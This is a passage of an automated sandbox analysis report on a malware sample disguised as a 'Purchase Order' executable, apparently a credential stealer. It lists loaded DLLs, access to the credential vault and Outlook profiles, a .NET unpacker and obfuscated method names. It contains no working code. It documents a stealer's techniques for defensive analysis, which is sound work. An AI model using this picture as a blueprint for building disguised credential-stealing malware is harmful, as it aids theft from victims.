                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Purchase Order..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Purchase Order..exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: isoburn.pdb source: Purchase Order..exe, 00000003.00000002.1835092143.0000000001278000.00000004.00000020.00020000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000005.00000002.2660645689.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: isoburn.pdbGCTL source: Purchase Order..exe, 00000003.00000002.1835092143.0000000001278000.00000004.00000020.00020000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000005.00000002.2660645689.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jfBrBcvTIMPfDU.exe, 00000005.00000000.1754034145.0000000000C1E000.00000002.00000001.01000000.0000000C.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000000.1907095632.0000000000C1E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Purchase Order..exe, 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1837480994.00000000046CE000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1835190405.0000000004515000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Purchase Order..exe, Purchase Order..exe, 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1837480994.00000000046CE000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1835190405.0000000004515000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, eIsPgl0kii0Wl5mLVU.cs.Net Code: rc6JmZMnx7 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Purchase Order..exe.59b0000.3.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, eIsPgl0kii0Wl5mLVU.cs.Net Code: rc6JmZMnx7 System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 0_2_0166EE60 push esp; iretd 0_2_0166EE61
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_004148DC pushad ; retf 3_2_004148E4
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_004032C0 push eax; ret 3_2_004032C2
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00426AB3 push es; retf 3_2_00426B5B
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00418ABC push ebx; ret 3_2_00418ABD
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00413BE9 push 00000025h; iretd 3_2_00413BF0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00417C83 push edx; retf 3_2_00417CC2
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00417D07 push edx; retf 3_2_00417CC2
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00401DE9 pushad ; retf 3_2_00401E17
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00404E1D push 2A89E27Eh; ret 3_2_00404E25
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00415625 push ebp; retf 3_2_00415626
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00404F61 push ss; ret 3_2_00404F62
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0183225F pushad ; ret 3_2_018327F9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018327FA pushad ; ret 3_2_018327F9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018609AD push ecx; mov dword ptr [esp], ecx3_2_018609B6
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0183283D push eax; iretd 3_2_01832858
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01831368 push eax; iretd 3_2_01831369
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01839939 push es; iretd 3_2_01839940
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A66BBB pushad ; retf 5_2_03A66BC3
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A6B315 push 00000035h; iretd 5_2_03A6B320
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A6B353 push ds; retf 5_2_03A6B356
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A6CA00 push ebx; ret 5_2_03A6CA01
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A57240 push ss; ret 5_2_03A57241
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A67904 push ebp; retf 5_2_03A67905
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A570FC push 2A89E27Eh; ret 5_2_03A57104
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A69FE6 push edx; retf 5_2_03A69FA1
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A69F62 push edx; retf 5_2_03A69FA1
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A65EC8 push 00000025h; iretd 5_2_03A65ECF
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A6CE29 push cs; retf 5_2_03A6CE2A
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A78D92 push es; retf 5_2_03A78E3A
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A6AD9B push ebx; ret 5_2_03A6AD9C
                Source: Purchase Order..exeStatic PE information: section name: .text entropy: 7.816664771480419
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, FfJJi6KdTSR3hklJfS.csHigh entropy of concatenated method names: 'YZn1vnQYoH', 'b7P188M6GB', 'XCcOUUPpT0', 'icoOCmbeA6', 'awQODMO1G6', 'LQ9OIlfq7Q', 'nRKO3exSl1', 'r6dOxIT1O4', 'OwHOZ6A7gX', 'MJEOp4MSaH'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, eIsPgl0kii0Wl5mLVU.csHigh entropy of concatenated method names: 'DITbwvNCQU', 'ksnbfUTena', 'QLsbWNNRxn', 'uuWbOmONs1', 'PI4b1FBdG0', 'oqtblsVq4W', 'vyJbgvLvk2', 'ui2b0DxpUe', 'PfvbdnPOOG', 'CgTboCXKMP'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, X558NpPrClr92QrkFG.csHigh entropy of concatenated method names: 'Sy4e2BJkZa', 'sNRe5V2wbW', 'ak9esAKX3J', 'aJketkwyQN', 'oGseCGIMP3', 'QjVeDxt3NB', 'vZOe34jwJ7', 'mbDex0bMaM', 'OsMepCWlQG', 'kG7equBLKK'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, VAc4cYWfGPlGTTre2M.csHigh entropy of concatenated method names: 'Dispose', 'KMMS9KG7Lj', 'YZJGttbAN5', 'hgY7iAWn3e', 'DACShk1f8J', 'H7XSzXkqJ8', 'ProcessDialogKey', 'wvbGT15Cpq', 'vEDGSs8yel', 'm45GG8awSN'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, GiVnSZSJMqpoDE5vlVN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SaVc41xKSI', 'HMwcXXOs9l', 'wVucntXMTD', 'Kuycc2JSOl', 'vUPcEWMBvr', 'GtWcB2TjK9', 'naNcQBNjJH'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, KWApDhrnlIMMKG7Lj2.csHigh entropy of concatenated method names: 'lJL47E80mJ', 'wX14R0JkJr', 'iwC444pI6D', 'piy4n9XWZX', 'Cr44E4yHw8', 'iN74QlDQZq', 'Dispose', 'WPXNfXgZbC', 'mGMNWkqBpY', 'XrENO15JpI'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, K20xuT5t8ka738jSGT.csHigh entropy of concatenated method names: 'vLyOAVUUuX', 'IkSO6ZyDQP', 'kaWO24yp39', 'WF2O58ls5C', 'gE3O7wI5tr', 'fMmOVHBXZ0', 'RrHORQuXeM', 'N2lONhSQHG', 'ammO4wB7u0', 'APZOXJnSex'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, bjs6Td2uGivbYQmp4T.csHigh entropy of concatenated method names: 'dFxWaCjuUg', 'BVlWMOPSiu', 'tPkWjaIyhW', 'hXAWyAxpHd', 'po8WimqyPE', 'dkWWHbgLld', 'iMWWrsx327', 'YDKWFbAwIt', 'lxTW9SuKRo', 'XfcWhPW6Fb'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, d15Cpq9BEDs8yelk45.csHigh entropy of concatenated method names: 'wlt4sa228h', 'mEM4tE0rIx', 'AW24Up2dfQ', 'FdT4Cs1ufX', 'xZj4DSIfFe', 'DaB4IQ30ew', 'hBY43ZlwqO', 'OWj4xWx73O', 'IkU4ZYwaBk', 'T8p4p9Z658'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, aBHJHV3DE8OaqpJiX6.csHigh entropy of concatenated method names: 'SLSgfL2GoI', 'CjsgOy9IJx', 'uc5glurxbU', 'PpHlhd2RSt', 'TeDlzGbl1G', 'URogTgbFZc', 'dssgSwQAU5', 'dBKgGn6HO9', 'bJ3gbN2g9h', 'JIHgJySrt4'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, b5CnbrzQsCtUglbpwt.csHigh entropy of concatenated method names: 'RKhX6kRZgZ', 'UGlX2jfwct', 'JGJX5pYbV7', 'kkmXsnLyxd', 'yo4Xthjpqj', 'q2AXCYVhwA', 'sXCXD4FMhg', 'xBMXQjpmYG', 'Mb6XLyIxdX', 'Y9MXYjS8rB'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, CawSNihv4RcLEZi9qp.csHigh entropy of concatenated method names: 'Hi0XOhXAuG', 'yFpX1eEmFQ', 'aYXXlBu9fr', 'NJxXgBJ5Oc', 'fxPX42VAEk', 'XWkX02esAU', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, vhYXNBSTvGVs4tjVGBX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pBUXqaB7nC', 'fVJXuhwyFw', 'vMhXPlxobd', 'l9hXatJbji', 'Yh0XMN4QSW', 'OQaXjyyolM', 'Jw4Xyn7wfv'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, we4V2XG0i6XbOcktoV.csHigh entropy of concatenated method names: 'f5RmhkTsF', 'TJNAIyoC7', 'pri6JeLUj', 'TnO80oQE3', 'QBB5rbQ3v', 'TgyKPU0kX', 'im7tErCJMWcQrnbHFu', 's59L9q7hkHxCDLopFs', 'c4ANReEuE', 'o9PXfY0GQ'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, AfEGgWHLTNYsIV8FDN.csHigh entropy of concatenated method names: 'auIRFs14o2', 'yeWRhqPAKV', 'SudNTv8vHW', 'LssNSCwmud', 'HpORqVwb0S', 'ICwRujtrT3', 'TinRPTlPiH', 'xwVRaW4iWU', 'w0xRMRtNxR', 'GICRjM41cT'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, tusbCoa6KHDaQKmnZL.csHigh entropy of concatenated method names: 'khE7pHUNjm', 'Xf07ufo6J8', 'Rdb7aEPVT6', 'b8I7MYCudZ', 'Lvs7t5R9op', 'zeT7Uw3RrA', 'CMi7Cl2fHf', 'mjX7DDrrB5', 't017Io3LmK', 'MIJ73w33kV'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, yYYhMwZcN3jPXYUdv8.csHigh entropy of concatenated method names: 'l37gLhbXSK', 'DLOgYbtfSG', 'xpwgmoNoP2', 'Y86gAPUcnZ', 'P5ggvPXWmW', 'HL8g6O2SJ4', 'FHlg8JGf1e', 'OYTg2qmsJG', 'V5Fg5BWGOP', 'FEwgKkid9a'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, McN3ZUSSuevx4UROYBK.csHigh entropy of concatenated method names: 'NjVXhpnQWu', 'BMhXzJDQp1', 'vUonTsG0gE', 'owHnSXyO1q', 'O80nGwmD6x', 'IfUnbEB6AT', 'BssnJwXgYj', 'G9NnwSMiqQ', 'W4Inf3iy2v', 'GAVnWu3DhS'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, pMF8XusKQTpZaPxHVF.csHigh entropy of concatenated method names: 'DBqlwetoya', 'SO7lWmmICZ', 'yT1l1UMMsq', 'edflgkBLq8', 'pZul0dAZ6K', 'L6N1id1Ptb', 'nGc1HUKYcq', 'yLn1rC1Eyu', 'Xv51FM4QWf', 'plY19UWoiL'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, qjI8eTCWdWAvnQBLyD.csHigh entropy of concatenated method names: 'NanlQxRx1Z', 'qqslLDUrww', 'hUjlmdYL6Y', 'GbxlA8fIp5', 'NISl6Ag1Jk', 'gipl8FXIwy', 'LSRl5t4NM6', 'z1SlKbkcaX', 'hb4IbESPQtWjLxu633Z', 'zWTZkaSJyN2MRZ7AHr0'
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, EoP4pFJAwENS4xQMlG.csHigh entropy of concatenated method names: 'mASSgjs6Td', 'PGiS0vbYQm', 'at8Soka738', 'SSGSkTKfJJ', 'nlJS7fSVMF', 'DXuSVKQTpZ', 'YwoPhs5iTwqroaV7ru', 'iDIOAeuWnGhdna21sQ', 'NkgSSB7y5h', 'Gv7SbLXF5n'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, FfJJi6KdTSR3hklJfS.csHigh entropy of concatenated method names: 'YZn1vnQYoH', 'b7P188M6GB', 'XCcOUUPpT0', 'icoOCmbeA6', 'awQODMO1G6', 'LQ9OIlfq7Q', 'nRKO3exSl1', 'r6dOxIT1O4', 'OwHOZ6A7gX', 'MJEOp4MSaH'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, eIsPgl0kii0Wl5mLVU.csHigh entropy of concatenated method names: 'DITbwvNCQU', 'ksnbfUTena', 'QLsbWNNRxn', 'uuWbOmONs1', 'PI4b1FBdG0', 'oqtblsVq4W', 'vyJbgvLvk2', 'ui2b0DxpUe', 'PfvbdnPOOG', 'CgTboCXKMP'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, X558NpPrClr92QrkFG.csHigh entropy of concatenated method names: 'Sy4e2BJkZa', 'sNRe5V2wbW', 'ak9esAKX3J', 'aJketkwyQN', 'oGseCGIMP3', 'QjVeDxt3NB', 'vZOe34jwJ7', 'mbDex0bMaM', 'OsMepCWlQG', 'kG7equBLKK'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, VAc4cYWfGPlGTTre2M.csHigh entropy of concatenated method names: 'Dispose', 'KMMS9KG7Lj', 'YZJGttbAN5', 'hgY7iAWn3e', 'DACShk1f8J', 'H7XSzXkqJ8', 'ProcessDialogKey', 'wvbGT15Cpq', 'vEDGSs8yel', 'm45GG8awSN'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, GiVnSZSJMqpoDE5vlVN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SaVc41xKSI', 'HMwcXXOs9l', 'wVucntXMTD', 'Kuycc2JSOl', 'vUPcEWMBvr', 'GtWcB2TjK9', 'naNcQBNjJH'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, KWApDhrnlIMMKG7Lj2.csHigh entropy of concatenated method names: 'lJL47E80mJ', 'wX14R0JkJr', 'iwC444pI6D', 'piy4n9XWZX', 'Cr44E4yHw8', 'iN74QlDQZq', 'Dispose', 'WPXNfXgZbC', 'mGMNWkqBpY', 'XrENO15JpI'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, K20xuT5t8ka738jSGT.csHigh entropy of concatenated method names: 'vLyOAVUUuX', 'IkSO6ZyDQP', 'kaWO24yp39', 'WF2O58ls5C', 'gE3O7wI5tr', 'fMmOVHBXZ0', 'RrHORQuXeM', 'N2lONhSQHG', 'ammO4wB7u0', 'APZOXJnSex'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, bjs6Td2uGivbYQmp4T.csHigh entropy of concatenated method names: 'dFxWaCjuUg', 'BVlWMOPSiu', 'tPkWjaIyhW', 'hXAWyAxpHd', 'po8WimqyPE', 'dkWWHbgLld', 'iMWWrsx327', 'YDKWFbAwIt', 'lxTW9SuKRo', 'XfcWhPW6Fb'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, d15Cpq9BEDs8yelk45.csHigh entropy of concatenated method names: 'wlt4sa228h', 'mEM4tE0rIx', 'AW24Up2dfQ', 'FdT4Cs1ufX', 'xZj4DSIfFe', 'DaB4IQ30ew', 'hBY43ZlwqO', 'OWj4xWx73O', 'IkU4ZYwaBk', 'T8p4p9Z658'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, aBHJHV3DE8OaqpJiX6.csHigh entropy of concatenated method names: 'SLSgfL2GoI', 'CjsgOy9IJx', 'uc5glurxbU', 'PpHlhd2RSt', 'TeDlzGbl1G', 'URogTgbFZc', 'dssgSwQAU5', 'dBKgGn6HO9', 'bJ3gbN2g9h', 'JIHgJySrt4'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, b5CnbrzQsCtUglbpwt.csHigh entropy of concatenated method names: 'RKhX6kRZgZ', 'UGlX2jfwct', 'JGJX5pYbV7', 'kkmXsnLyxd', 'yo4Xthjpqj', 'q2AXCYVhwA', 'sXCXD4FMhg', 'xBMXQjpmYG', 'Mb6XLyIxdX', 'Y9MXYjS8rB'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, CawSNihv4RcLEZi9qp.csHigh entropy of concatenated method names: 'Hi0XOhXAuG', 'yFpX1eEmFQ', 'aYXXlBu9fr', 'NJxXgBJ5Oc', 'fxPX42VAEk', 'XWkX02esAU', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, vhYXNBSTvGVs4tjVGBX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pBUXqaB7nC', 'fVJXuhwyFw', 'vMhXPlxobd', 'l9hXatJbji', 'Yh0XMN4QSW', 'OQaXjyyolM', 'Jw4Xyn7wfv'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, we4V2XG0i6XbOcktoV.csHigh entropy of concatenated method names: 'f5RmhkTsF', 'TJNAIyoC7', 'pri6JeLUj', 'TnO80oQE3', 'QBB5rbQ3v', 'TgyKPU0kX', 'im7tErCJMWcQrnbHFu', 's59L9q7hkHxCDLopFs', 'c4ANReEuE', 'o9PXfY0GQ'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, AfEGgWHLTNYsIV8FDN.csHigh entropy of concatenated method names: 'auIRFs14o2', 'yeWRhqPAKV', 'SudNTv8vHW', 'LssNSCwmud', 'HpORqVwb0S', 'ICwRujtrT3', 'TinRPTlPiH', 'xwVRaW4iWU', 'w0xRMRtNxR', 'GICRjM41cT'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, tusbCoa6KHDaQKmnZL.csHigh entropy of concatenated method names: 'khE7pHUNjm', 'Xf07ufo6J8', 'Rdb7aEPVT6', 'b8I7MYCudZ', 'Lvs7t5R9op', 'zeT7Uw3RrA', 'CMi7Cl2fHf', 'mjX7DDrrB5', 't017Io3LmK', 'MIJ73w33kV'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, yYYhMwZcN3jPXYUdv8.csHigh entropy of concatenated method names: 'l37gLhbXSK', 'DLOgYbtfSG', 'xpwgmoNoP2', 'Y86gAPUcnZ', 'P5ggvPXWmW', 'HL8g6O2SJ4', 'FHlg8JGf1e', 'OYTg2qmsJG', 'V5Fg5BWGOP', 'FEwgKkid9a'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, McN3ZUSSuevx4UROYBK.csHigh entropy of concatenated method names: 'NjVXhpnQWu', 'BMhXzJDQp1', 'vUonTsG0gE', 'owHnSXyO1q', 'O80nGwmD6x', 'IfUnbEB6AT', 'BssnJwXgYj', 'G9NnwSMiqQ', 'W4Inf3iy2v', 'GAVnWu3DhS'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, pMF8XusKQTpZaPxHVF.csHigh entropy of concatenated method names: 'DBqlwetoya', 'SO7lWmmICZ', 'yT1l1UMMsq', 'edflgkBLq8', 'pZul0dAZ6K', 'L6N1id1Ptb', 'nGc1HUKYcq', 'yLn1rC1Eyu', 'Xv51FM4QWf', 'plY19UWoiL'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, qjI8eTCWdWAvnQBLyD.csHigh entropy of concatenated method names: 'NanlQxRx1Z', 'qqslLDUrww', 'hUjlmdYL6Y', 'GbxlA8fIp5', 'NISl6Ag1Jk', 'gipl8FXIwy', 'LSRl5t4NM6', 'z1SlKbkcaX', 'hb4IbESPQtWjLxu633Z', 'zWTZkaSJyN2MRZ7AHr0'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, EoP4pFJAwENS4xQMlG.csHigh entropy of concatenated method names: 'mASSgjs6Td', 'PGiS0vbYQm', 'at8Soka738', 'SSGSkTKfJJ', 'nlJS7fSVMF', 'DXuSVKQTpZ', 'YwoPhs5iTwqroaV7ru', 'iDIOAeuWnGhdna21sQ', 'NkgSSB7y5h', 'Gv7SbLXF5n'
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
